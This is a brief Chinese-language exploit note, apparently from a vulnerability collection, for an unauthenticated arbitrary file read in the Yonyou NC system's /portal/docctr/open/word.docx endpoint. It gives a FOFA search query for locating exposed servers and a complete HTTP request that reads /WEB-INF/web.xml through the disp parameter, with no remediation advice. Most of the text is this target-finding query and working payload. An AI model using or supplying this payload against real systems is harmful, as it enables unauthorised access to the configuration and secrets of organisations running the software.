Y4-54用友-NC-任意文件读取
漏洞描述:
用友NC 系统word.docx等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
网站图片:
网络测绘:
fofa语法:
body=“UClient.dmg”
漏洞复现:
payload:
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
效果图:
读取web.xml配置文件